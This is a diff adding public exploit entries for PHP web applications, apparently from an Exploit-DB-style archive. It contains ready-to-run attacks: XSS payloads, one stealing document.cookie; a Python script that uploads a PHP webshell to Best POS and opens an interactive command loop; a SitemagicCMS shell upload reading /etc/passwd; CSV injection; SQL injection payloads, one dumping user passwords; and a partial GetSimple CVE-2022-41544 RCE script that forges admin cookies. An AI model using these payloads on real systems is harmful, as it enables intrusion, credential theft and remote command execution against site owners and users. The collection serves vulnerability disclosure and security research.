+1.go to 'Episodes' then 'Upload New Episodes'(http://localhost/PodcastGenerator/admin/episodes_upload.php)
+2.set title section as <img src=1 onerror=alert("XSS-1")>
+3.And go to 'View All Episoded'(http://localhost/PodcastGenerator/admin/episodes_list.php)
+
+payload: <img src=1 onerror=alert("XSS-1")>
+
+poc- request:
+
+POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
+Host: localhost
+Content-Length: 8307
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3NXAbhxohxCgUFNi
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="file"; filename="2023-05-13_2_images.jpeg"
+Content-Type: image/jpeg
+
+image content asdfasdfasdfasdfasdfasdfasdfa
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="title"
+
+<img src=1 onerror=alert("XSS-1")>
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="shortdesc"
+
+fffff
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="date"
+
+2023-05-14
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="time"
+
+11:05
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="episodecover"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="longdesc"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="episodenum"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="seasonnum"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="itunesKeywords"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="explicit"
+
+yes
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="authorname"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="authoremail"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="customtags"
+
+
+------WebKitFormBoundary3NXAbhxohxCgUFNi
+Content-Disposition: form-data; name="token"
+
+6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
+------WebKitFormBoundary3NXAbhxohxCgUFNi--
+
+
+
+
+
+
+#########XSS -2##############
+1.go to "Themes and aspect" then "Customize your Freebox" (http://localhost/PodcastGenerator/admin/theme_freebox.php)
+2. set Freebox content as <script>alert("XSS-2")</script>
+3.go to home page (http://localhost/PodcastGenerator/)
+
+payload: <script>alert("XSS-2")</script>
+
+poc Request:
+
+POST /PodcastGenerator/admin/theme_freebox.php?change=1 HTTP/1.1
+Host: localhost
+Content-Length: 96
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/theme_freebox.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+content=%3Cscript%3Ealert%28%22XSS-2%22%29%3C%2Fscript%3E&token=6GnmEMNnhFfyNeTRciGsh8p4R4djazh8
+
+#########XSS -3##############
+
+1. go to "Podcast Details" then "Change Podcast Details" (http://localhost/PodcastGenerator/admin/podcast_details.php)
+2. set "Podcast tile " as <svg/onload=prompt("XSS-3")>
+3.go to home page (http://localhost/PodcastGenerator/)
+
+payload: <svg/onload=prompt("XSS-3")>
+
+poc-request:
+
+POST /PodcastGenerator/admin/podcast_details.php?edit=1 HTTP/1.1
+Host: localhost
+Content-Length: 300
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/PodcastGenerator/admin/podcast_details.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=b8oeamte4ebbhtu52dgnsrkljn
+Connection: close
+
+podcast_title=%3Csvg%2Fonload%3Dprompt%28%22XSS-3%22%29%3E&podcast_subtitle=dd&podcast_description=dd&copyright=dd&author_name=Podcast+Generator+UserP&author_email=podcastgenerator%40example.com&podcast_guid=&feed_language=en&explicit_podcast=yes&feed_locked=no&token=xVrlAT6NG2ZrbGanycblGYoOOIitXXKC
\ No newline at end of file
diff --git a/exploits/php/webapps/51462.py b/exploits/php/webapps/51462.py
new file mode 100755
index 000000000..5bedcff56
--- /dev/null
+++ b/exploits/php/webapps/51462.py
@@ -0,0 +1,148 @@
+# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
+# Google Dork: NA
+# Date: 15/5/2023
+# Exploit Author: Mesut Cetin
+# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
+# Version: 1.0
+# Tested on: Kali Linux
+
+import sys
+import requests
+import subprocess
+import time
+
+if len(sys.argv) < 2:
+    print("\033[91mUsage: %s <IP>\033[0m" % sys.argv[0])
+    print("Example: %s 192.168.106.130" % sys.argv[0])
+    sys.exit(1)
+
+ip = sys.argv[1]
+url = f"http://{ip}/kruxton/ajax.php?action=save_settings"
+
+def brute_force_timestamp(timestamp_prev, ip):
+    progress = 0
+    webshell = None
+
+    for i in range(20):
+        for j in range(0, 1000, 20):
+            timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
+            url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
+
+            response = requests.get(url)
+            if response.status_code == 200:
+                webshell = url
+                break
+
+            progress += 1
+            print(f"Attempt {progress}/400", end="\r")
+            time.sleep(0.1)
+
+            if progress >= 400:
+                break
+
+        if webshell or progress >= 400:
+            break
+
+    if webshell:
+        print("\033[92m[+] Webshell found:", webshell, "\033[0m")
+    else:
+        print("\033[91m[-] Webshell not found\033[0m")
+
+    return webshell
+
+def get_unix_timestamp():
+    timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
+    return int(timestamp)
+
+def extract_output(response_text):
+    start_tag = "<pre>"
+    end_tag = "</pre>"
+    start_index = response_text.find(start_tag)
+    end_index = response_text.find(end_tag)
+
+    if start_index != -1 and end_index != -1 and start_index < end_index:
+        output = response_text[start_index + len(start_tag):end_index]
+        return output.strip()
+
+    return None
+
+def code_execution(webshell):
+    if not webshell:
+        print("\033[91mWebshell URI not provided\033[0m")
+        return
+
+    while True:
+        command = input("Enter command to execute (or 'exit' to quit): ")
+        if command == 'exit':
+            break
+
+        url = webshell + f"?cmd={command}"
+        response = requests.get(url)
+
+        output = extract_output(response.text)
+        if output:
+            print("\033[93m[+] Output:\033[0m")
+            print(output)
+        else:
+            print("\033[91m[-] No output received\033[0m")
+
+data = '''\
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="name"
+
+test
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="email"
+
+test@gmail.com
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="contact"
+
+9000000000
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="about"
+
+test
+-----------------------------49858899034227071432271107689
+Content-Disposition: form-data; name="img"; filename="shell.php"
+Content-Type: application/x-php
+
+<html>
+<body>
+<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
+<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
+<input type="SUBMIT" value="Execute">
+</form>
+<pre>
+<?php
+    if(isset($_GET['cmd']))
+    {
+        system($_GET['cmd']);
+    }
+?>
+</pre>
+</body>
+</html>
+
+-----------------------------49858899034227071432271107689--'''
+
+headers = {
+    'Host': f"{ip}",
+    'X-Requested-With': 'XMLHttpRequest',
+    'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
+    'Content-Length': str(len(data)),
+    'Connection': 'close'
+}
+
+timestamp_prev = get_unix_timestamp()
+response = requests.post(url, data=data, headers=headers)
+
+if response.status_code == 200 and response.text == '1':
+    print("[+] Timestamp: %s" % timestamp_prev)
+    print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
+    webshell = brute_force_timestamp(timestamp_prev, ip)
+    code_execution(webshell)
+
+else:
+    print("Did not worked")
\ No newline at end of file
diff --git a/exploits/php/webapps/51463.txt b/exploits/php/webapps/51463.txt
new file mode 100644
index 000000000..78cf0e55c
--- /dev/null
+++ b/exploits/php/webapps/51463.txt
@@ -0,0 +1,20 @@
+Exploit Title: Prestashop 8.0.4 - CSV injection
+Application: prestashop
+Version: 8.0.4
+Bugs:  CSV Injection
+Technology: PHP
+Vendor URL: https://prestashop.com/
+Software Link: https://prestashop.com/prestashop-edition-basic/
+Date of found: 14.05.2023
+Author: Mirabbas Ağalarov
+Tested on: Windows
+
+
+2. Technical Details & POC
+========================================
+Step 1. login as user
+step 2. Go to My Account then information ( http://localhost/index.php?controller=identity )
+step 3. Set Email as  =calc|a!z|@test.com
+step 3. If admin Export costumers as CSV  file ,in The computer of admin  occurs csv injection and will open calculator (http://localhost/admin07637b2omxxdbmhikgb/index.php/sell/customers/?_token=mtc1BTvq-Oab2lBdfCaxpOorYraGGVMiTFluJzOpkWI)
+
+payload: =calc|a!z|@test.com
\ No newline at end of file
diff --git a/exploits/php/webapps/51464.txt b/exploits/php/webapps/51464.txt
new file mode 100644
index 000000000..c075a8587
--- /dev/null
+++ b/exploits/php/webapps/51464.txt
@@ -0,0 +1,63 @@
+#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)
+#Application: SitemagicCMS
+#Version: 4.4.3
+#Bugs:  RCE
+#Technology: PHP
+#Vendor URL: https://sitemagic.org/Download.html
+#Software Link: https://github.com/Jemt/SitemagicCMS
+#Date of found: 14-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+1. go to content then files
+2. upload shell.phar file but content as  <?php echo system("cat /etc/passwd"); ?>
+3. go to  http://localhost/SitemagicCMS/files/images/shell.phar
+
+
+
+payload: <?php echo system("cat /etc/passwd"); ?>
+
+
+
+Poc request :
+
+POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
+Host: localhost
+Content-Length: 492
+Cache-Control: max-age=0
+sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf
+Connection: close
+
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W
+Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"
+Content-Type: application/octet-stream
+
+<?php echo system('cat /etc/passwd'); ?>
+
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W
+Content-Disposition: form-data; name="SMPostBackControl"
+
+
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W
+Content-Disposition: form-data; name="SMRequestToken"
+
+60a7a113cf94842a197912273825b421
+------WebKitFormBoundarywPUsZSbtgJ6nAn8W--
\ No newline at end of file
diff --git a/exploits/php/webapps/51465.txt b/exploits/php/webapps/51465.txt
new file mode 100644
index 000000000..b898117bd
--- /dev/null
+++ b/exploits/php/webapps/51465.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
+# Date: 15 May 2023
+# Exploit Author: Astik Rawat (ahrixia)
+# Vendor Homepage: https://qloapps.com/
+# Software Link: https://github.com/webkul/hotelcommerce
+# Version: 1.5.2
+# Tested on: Kali Linux 2022.4
+# CVE : CVE-2023-30256
+
+
+Description:
+
+A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.
+
+Steps to exploit:
+1) Go to Signin page on the system.
+2) There are two parameters which can be exploited via XSS
+	- back
+	- email_create
+
+2.1) Insert your payload in the "back"- GET and POST Request
+	Proof of concept (Poc):
+	The following payload will allow you to execute XSS -
+
+	Payload (Plain text):
+	xss onfocus=alert(1) autofocus= xss
+
+	Payload (URL Encoded):
+	xss%20onfocus%3dalert(1)%20autofocus%3d%20xss
+
+	Full GET Request (back):
+	[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]
+
+2.2) Insert your payload in the "email_create" - POST Request Only
+	Proof of concept (Poc):
+	The following payload will allow you to execute XSS -
+
+	Payload (Plain text):
+	xss><img src=a onerror=alert(document.cookie)>xss
+
+	Payload (URL Encoded):
+	xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss
+
+	POST Request (email_create) (POST REQUEST DATA ONLY):
+	[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]
\ No newline at end of file
diff --git a/exploits/php/webapps/51468.txt b/exploits/php/webapps/51468.txt
new file mode 100644
index 000000000..f326dcb08
--- /dev/null
+++ b/exploits/php/webapps/51468.txt
@@ -0,0 +1,28 @@
+[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
+[#] Exploit Date: May 16, 2023.
+[#] CVSS 3.1: 6.4 (Medium)
+[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+[#] Tactic: Initial Access (TA0001)
+[#] Technique: Exploit Public-Facing Application (T1190)
+[#] Application Name: Affiliate Me
+[#] Application Version: 5.0.1
+[#] Vendor: https://www.powerstonegh.com/
+
+
+[#] Author: h4ck3r - Faisal Albuloushi
+[#] Contact: SQL@hotmail.co.uk
+[#] Blog: https://www.0wl.tech
+
+
+[#] Exploit:
+
+[path]/admin.php?show=reply&id=[Injected Query]
+
+
+[#] 3xample:
+
+[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
+
+
+[#] Notes:
+- A normal admin can exploit this vulnerability to escalate his privileges to super admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/51471.txt b/exploits/php/webapps/51471.txt
new file mode 100644
index 000000000..91f318e86
--- /dev/null
+++ b/exploits/php/webapps/51471.txt
@@ -0,0 +1,45 @@
+# Exploit Title: LeadPro CRM v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578
+# Demo Site: https://demo.leadifly.in
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10
+HTTP/1.1
+Host: localhost
+Cookie:
+XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;
+leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: application/json
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V
+Authorization: Bearer
+eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8
+X-Xsrf-Token:
+eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=
+Referer: https://localhost/admin/product
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+
+### Parameter & Payloads ###
+
+Parameter: filters (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name
+lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND
+(8549=8549&order=id desc&offset=0&limit=10
\ No newline at end of file
diff --git a/exploits/php/webapps/51472.txt b/exploits/php/webapps/51472.txt
new file mode 100644
index 000000000..dc04ec3b2
--- /dev/null
+++ b/exploits/php/webapps/51472.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Smart School v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/smart-school-school-management-system/19426018
+# Demo Site: https://demo.smart-school.in
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /course/filterRecords/ HTTP/1.1
+Host: localhost
+Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
+Firefox/102.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 136
+Origin: https://localhost
+Referer: https://localhost/course/
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+
+searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1
+
+
+### Parameter & Payloads ###
+
+Parameter: searchdata[0][searchfield] (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload:
+searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id
+AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--
+hAHp&searchdata[0][searchvalue]=1
\ No newline at end of file
diff --git a/exploits/php/webapps/51473.txt b/exploits/php/webapps/51473.txt
new file mode 100644
index 000000000..0c64b543c
--- /dev/null
+++ b/exploits/php/webapps/51473.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
+# Demo Site: https://demo.stackposts.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /spmo/auth/login HTTP/1.1
+X-Requested-With: XMLHttpRequest
+Referer: https://localhost/spmo/
+Content-Type: application/x-www-form-urlencoded
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Length: 104
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*
+
+
+### Parameter & Payloads ###
+
+Parameter: username (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')
+AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg
\ No newline at end of file
diff --git a/exploits/php/webapps/51474.txt b/exploits/php/webapps/51474.txt
new file mode 100644
index 000000000..a64b1bbda
--- /dev/null
+++ b/exploits/php/webapps/51474.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Quicklancer v1.0 - SQL Injection
+# Date: 2023-05-17
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor:
+https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
+# Demo Site: https://quicklancer.bylancer.com
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+### Request ###
+
+POST /php/user-ajax.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+x-requested-with: XMLHttpRequest
+Referer: https://localhost
+Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;
+quickjob_view_counted=31; Quick_lang=arabic
+Content-Length: 93
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+action=searchStateCountry&dataString=deneme
+
+
+### Parameter & Payloads ###
+
+Parameter: dataString (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068
+FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo
\ No newline at end of file
diff --git a/exploits/php/webapps/51475.py b/exploits/php/webapps/51475.py
new file mode 100755
index 000000000..9f88973b8
--- /dev/null
+++ b/exploits/php/webapps/51475.py
@@ -0,0 +1,140 @@
+# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
+# Data: 18/5/2023
+# Exploit Author : Youssef Muhammad
+# Vendor: Get-simple
+# Software Link:
+# Version app: 3.3.16
+# Tested on: linux
+# CVE: CVE-2022-41544
+
+import sys
+import hashlib
+import re
+import requests
+from xml.etree import ElementTree
+from threading import Thread
+import telnetlib
+
+purple = "\033[0;35m"
+reset = "\033[0m"
+yellow = "\033[93m"
+blue = "\033[34m"
+red = "\033[0;31m"
+
+def print_the_banner():
+    print(purple + '''
+ CCC V     V EEEE      22   000   22   22      4  4  11  5555 4  4 4  4
+C    V     V E        2  2 0  00 2  2 2  2     4  4 111  5    4  4 4  4
+C     V   V  EEE  ---   2  0 0 0   2    2  --- 4444  11  555  4444 4444
+C      V V   E         2   00  0  2    2          4  11     5    4    4
+ CCC    V    EEEE     2222  000  2222 2222        4 11l1 555     4    4
+ '''+ reset)
+
+def get_version(target, path):
+    r = requests.get(f"http://{target}{path}admin/index.php")
+    match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)
+    if match:
+        version = match.group(1)
+        if version <= "3.3.16":
+            print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")
+        else:
+            print ("This is not vulnrable to this CVE")
+        return version
+    return None
+
+def api_leak(target, path):
+    r = requests.get(f"http://{target}{path}data/other/authorization.xml")
+    if r.ok:
+        tree = ElementTree.fromstring(r.content)
+        apikey = tree[0].text
+        print(f"[+] apikey obtained {apikey}")
+        return apikey
+    return None
+
+def set_cookies(username, version, apikey):
+    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
+    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
+    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
+    headers = {
+        'Content-Type':'application/x-www-form-urlencoded',
+        'Cookie': cookies
+    }
+    return headers
+
+def get_csrf_token(target, path, headers):
+    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
+    m = re.search('nonce" type="hidden" value="(.*)"', r.text)
+    if m:
+        print("[+] csrf token obtained")
+        return m.group(1)
+    return None
+
+def upload_shell(target, path, headers, nonce, shell_content):
+    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
+    payload = {
+        'content': shell_content,
+        'edited_file': '../shell.php',
+        'nonce': nonce,
+        'submitsave': 1
+    }
+    try:
+        response = requests.post(upload_url, headers=headers, data=payload)
+        if response.status_code == 200:
+            print("[+] Shell uploaded successfully!")
+        else:
+            print("(-) Shell upload failed!")
+    except requests.exceptions.RequestException as e:
+        print("(-) An error occurred while uploading the shell:", e)
+def shell_trigger(target, path):
+    url = f"http://{target}{path}/shell.php"
+    try:
+        response = requests.get(url)
+        if response.status_code == 200:
+            print("[+] Webshell trigged successfully!")
+        else:
+            print("(-) Failed to visit the page!")
+    except requests.exceptions.RequestException as e:
+        print("(-) An error occurred while visiting the page:", e)
+
+def main():
+    if len(sys.argv) != 5:
+        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
+        return
+
+    target = sys.argv[1]
